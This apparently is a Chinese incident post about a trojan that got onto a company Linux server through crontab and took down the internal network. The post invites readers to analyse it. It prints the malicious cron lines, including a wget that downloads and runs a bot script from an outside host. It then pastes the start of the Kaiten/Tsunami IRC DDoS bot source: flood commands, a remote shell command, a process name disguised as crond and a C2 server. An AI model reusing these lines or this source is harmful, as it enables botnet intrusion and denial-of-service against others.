前几天公司服务器被添加了一木马恶意程序，该程序一运行便对外发起了大量的连接，导致整个内网瘫痪掉，该木马注入的方式非常简单，只是在Linux crond定时器里加入以下任务：

[root@localhost tmp]# crontab -l
* * * * * /root/.zxc >/dev/null 2>&1
@weekly wget -q http://stablehost.us/bots/regular.bot -O /tmp/.a;chmod +x /tmp/.a;sh /tmp/.a >/dev/null 2>&1

      从指定网站下载相应的sh 脚本代码并运行，再下载木马程序源代码在本机编译执行，不断地对外发送数据包，有兴趣的朋友可以研究一下，看看该木马是要干什么的

木马的程序代码如下：

/*       
 *       !* SH uname -a                                                        *
 * There are a number of commands that can be sent to the client:              *
 *       TSUNAMI <target> <secs>       = A PUSH+ACK flooder                    *
 *       PAN <target> <port> <secs>    = A SYN flooder                         *
 *       UDP <target> <port> <secs>    = An UDP flooder                        *
 *       UNKNOWN <target> <secs>       = Another non-spoof udp flooder         *
 *       NICK <nick>                   = Changes the nick of the client        *
 *       SERVER <server>               = Changes servers                       *
 *       GETSPOOFS                     = Gets the current spoofing             *
 *       SPOOFS <subnet>               = Changes spoofing to a subnet          *
 *       DISABLE                       = Disables all packeting from this bot  *
 *       ENABLE                        = Enables all packeting from this bot   *
 *       KILL                          = Kills the knight                      *
 *       GET <http address> <save as>  = Downloads a file off the web          *
 *       VERSION                       = Requests version of knight            *
 *       KILLALL                       = Kills all current packeting           *
 *       HELP                          = Displays this                         *
 *       IRC <command>                 = Sends this command to the server      *
 *       SH <command>                  = Executes a command                    *
 * Remember, all these commands must be prefixed by a ! and the nickname that  *
 * you want the command to be sent to (can include wildcards). There are no    *
 * spaces in between the ! and the nickname, and there are no spaces before    *
 * the !                                                                       *
 *                                                                             *
 *                               - contem on efnet                             *
 *******************************************************************************/
////////////////////////////////////////////////////////////////////////////////
//                                EDIT THESE                                  //
////////////////////////////////////////////////////////////////////////////////
#define STARTUP			// Start on startup?
#undef IDENT			// Only enable this if you absolutely have to
#define FAKENAME "crond"	// What you want this to hide as
#define CHAN "#bsd"	// Channel to join
#define KEY "routers"		// The key of the channel
#define IRCPORT "6667"

int numservers=1;		// Must change this to equal number of servers down there
char *servers[] = {		// List the servers in that format, always end in (void*)0
        "linksys.secureshellz.net",
        (void*)0
};
////////////////////////////////////////////////////////////////////////////////
//                               STOP HERE!                                   //
////////////////////////////////////////////////////////////////////////////////
#include <stdarg.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#inclu